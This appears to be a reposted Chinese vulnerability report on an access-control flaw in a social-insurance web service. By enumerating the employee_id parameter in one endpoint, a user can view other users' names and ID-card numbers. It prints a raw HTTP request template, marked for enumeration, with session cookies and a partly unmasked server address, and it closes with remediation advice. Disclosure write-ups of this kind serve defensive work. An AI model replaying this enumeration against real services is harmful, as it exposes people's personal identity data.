目录导航
51社保某处越权漏洞导致用户信息泄露
权限绕过查看任意用户个人信息,姓名,身份证等
- 厂商 dingxue
- 问题点
/shebao/fillinfomation?insurance_location_id=6&employee_id=203§66§&person_id=*****&action=zr01危害描述
权限绕过查看任意用户个人信息,姓名,身份证等
漏洞产生原因
参数未过滤
测试过程
访问微小宝http://***.***.**.***:8015/,注册登录,填写个人信息,
在填写参保人信息处存在越权,employee_id参数可被遍历:
数据包如下:
GET /shebao/fillinfomation?insurance_location_id=6&employee_id=***§66§&person_id=***&action=zr01 HTTP/1.1
Host: ***.***.**.***:8015
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://101.200.47.130:8015/insuranceGoods/InsuredCity?employee_id=20367&person_id=1906&action=zr01&ppkstr=23a0c06b&sign=2ab6c3cc61823741e21c0c16b1535640
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=38472b126ad61367accf611ee2177868; sensorsdata_is_new_user=true; mediav=%7B%22eid%22%3A%22247642%22%2C%22ep%22%3A%22%22%2C%22vid%22%3A%22J%3C7.725%28S%5B%3A%23s%5BD.lsmc%22%2C%22ctn%22%3A%22%22%7D; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%2215d7cb69eec252-027ceb515d3c64-396b4e08-1049088-15d7cb69eed504%22%2C%22props%22%3A%7B%22%24latest_referrer%22%3A%22%22%2C%22%24latest_referrer_host%22%3A%22%22%7D%7D; QIAO_CK_4496944_R=; XSRF-TOKEN=eyJpdiI6Ik4ydW01bHlYVk13cG5NQ1c1R0M5M2c9PSIsInZhbHVlIjoiNkNjc0trK1d1M3hcLzUxVmsyZ3htNlkwTER0NzB3M0dNVFF5Qzlrb2NSOW5WUmdCNHRaK1k5ZkFUcGFha1ZEbDJkeXdXYWpJdUpvWEpadE15b0RubVhnPT0iLCJtYWMiOiIyNGIwYzhjNDZmNDg1MDk2MzFkMWRhNDAwZmIwZWNiZDQ5MDA1MTA3YTIwMTBkZjQyZjMyY2Q0OTgyNWNhYmVmIn0%3D; JSESSIONID=ebaa9b41-e550-4d85-b86d-526a45188dc8; zg_a815ea19015249a89df426c65e1af46c=%7B%22sid%22%3A%201501038882.966%2C%22updated%22%3A%201501038882.974%2C%22info%22%3A%201501035913966%2C%22cuid%22%3A%20%22%22%7D; laravel_session=eyJpdiI6ImhxNUZlQTIwNUExc3RjZFhwcGxnR2c9PSIsInZhbHVlIjoiWkttQWFwMzIrRmF0amNPZmVqMVIrQUhKU3NKdVVTdHVQWU1rQzVNb1hJaG5pSDdPRlNpUmlOVGlWK1hhdzl2ZUZEekE1eXBqZyt5YzZaeHQ3MzR1dkE9PSIsIm1hYyI6ImQ4Yjc2YjI3OWE3OTYzZDMwNTFiMDA0MmNlODIzYTBiZDA1ZDZmNTM0MTkzMTljZDU2ZTY3NDFiMGRlMzNiZmUifQ%3D%3D; zg_did=%7B%22did%22%3A%20%2215d7cb662e3216-0784492e5511c4-396b4e08-100200-15d7cb662e43c7%22%7D; zg_0deb6c6901bb4eb1b0f324b22d68b5d1=%7B%22sid%22%3A%201501039780.298%2C%22updated%22%3A%201501039780.298%2C%22info%22%3A%201501035929285%7D; _ga=GA1.1.342311860.1501035929; _gid=GA1.1.581291768.1501035929; Hm_lvt_717da9fbbb380c7b043ea096861c919d=1501035929; Hm_lpvt_717da9fbbb380c7b043ea096861c919d=1501039780; responseTimeline=321; _qzja=1.1931991145.1501035929340.1501035929341.1501039780458.1501035929341.1501039780458.0.0.0.2.2; _qzjb=1.1501039780458.1.0.0.0; _qzjc=1; _qzjto=2.2.0; Hm_lvt_da0f0096fceb023ff28522eece668c90=1501035792; Hm_lpvt_da0f0096fceb023ff28522eece668c90=1501039803; Hm_lvt_9ff162bfe3685ed2a2c02c334f975e51=1501035792; Hm_lpvt_9ff162bfe3685ed2a2c02c334f975e51=1501039803
Connection: close
修复建议
业务逻辑缺陷: 1. 对数据操作时需要加锁。 2. 权限控制要设计好,避免操作越权出现。 3. 业务逻辑需要严谨控制,对敏感业务操作需要校验身份信息,修改操作需要二次验证, session ID 和认证的token做绑定,放在服务器的会话里,不发送给客户端。
此文章来源于
http://www.ddosi.org/2017/10/19/51/
2018年以前网站服务器的备份,当时决定不要了,删了所有东西,现在还原一下(有些图片挂了,永远找不回来了,sorry)
from